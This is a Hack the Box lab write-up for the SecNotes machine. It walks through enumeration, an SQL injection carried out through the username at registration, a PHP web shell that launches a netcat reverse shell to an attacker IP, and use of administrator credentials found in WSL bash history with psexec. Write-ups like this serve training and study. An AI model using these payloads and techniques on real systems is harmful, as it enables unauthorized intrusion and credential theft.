SecNotes
Overview
SecNotes is a vulnerable machine from Hack the Box that requires some basic web enumeration and file reading, with using SQL Injection on the login page. The foothold is accomplished after some enumeration of a couple files in the web server, and then putting a shell in the smb drive. The privilege escalation is using a file on the machine to check the history of the windows subsystem for linux to find credentials, and using this to gain admin access.
Nmap Scan
nmap -T3 -Pn 10.10.10.97 -vvv
- 80/tcp open http syn-ack
- 445/tcp open microsoft-ds syn-ack
- 8808/tcp open ssports-bcast syn-ack
OS version: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
Basic Enumeration
Nothing coming up with smbclient, likely need an actual user rather than guest login. We can check out the web page, and run some web enumerations like nikto and gobuster while we check out whats on the web at both port 80 and 8808.
Gobuster gives us a fair number of web pages to check out:
1
2
3
4
5
6
7
8
9
10
11
/auth.php (Status: 500) [Size: 1208]
/contact.php (Status: 302) [Size: 0] [--> login.php]
/Contact.php (Status: 302) [Size: 0] [--> login.php]
/DB.php (Status: 500) [Size: 1208]
/db.php (Status: 500) [Size: 1208]
/home.php (Status: 302) [Size: 0] [--> login.php]
/Home.php (Status: 302) [Size: 0] [--> login.php]
/login.php (Status: 200) [Size: 1223]
/Login.php (Status: 200) [Size: 1223]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/register.php (Status: 200) [Size: 1569]
PHP is used in this environment on the web service: PHP/7.2.7.
- At the login portal, we see we have the abilitiy to register. Here, we can test and see if SQL Injection is available to use by registering as user
'OR 1 OR'. - Using this user and signing in, we have unexpected access to other user notes.
- Checking out the other notes, we can see a note that gives us a password:
tyler / 92g!mA8BGjOirkL%OG*&
Foothold
Using the credentials we found, we can now enumerate the smb shares, and can see the share new-site:
1
2
3
4
5
6
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
new-site READ, WRITE
- Using the level of access we have, we can try to put files onto the machine for execution. Putting something like
nc64.exeis not enough, as we can’t access that on the web. Since there is php on the web site, we can put a second file that will allow us to getnc64.exeto run.
1
2
3
<?php
system('nc64.exe -e cmd.exe 10.10.16.3 5555')
?>
- After we put both files into this share, we go out to the site on port 8808, and the file
rev1.phpshould be accessible. With a netcat listener on our end, we can get a reverse shell after going to the page: http://10.10.10.97:8808/rev1.php - We have to do it in quick succession, as we have found that files get cleared from the host every few minutes. We now have access to
user.txt:
Local Enumeration
Trying to bring over files like winpeas didn’t work and got blocked by the system AV. After doing some more manual checks on the host, we find that this machine has the windows subsystem for linux on it.
- We find this and the bash executable inside a
winsxsfile path. - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-subsystem-for-linux-wsl
From here, we can run the bash.exe file and drop into this subsystem.
Privilege Escalation
We are now in the linux local shell on the host. The interactive shell is a bit unstable, and we should escape using a tty escape. We can run the following to get a cleaner tty: python -c 'import pty; pty.spawn("/bin/bash")'
While we are in this shell, we can poke around a bit to see what is here. A quick history check gives us the administator credentials:
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$(the%symbol signifies a space)- With this, we should be able to run
psexecand easily login as the administrator:impacket-psexec 'administrator:u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97 - We can now read
root.txt:
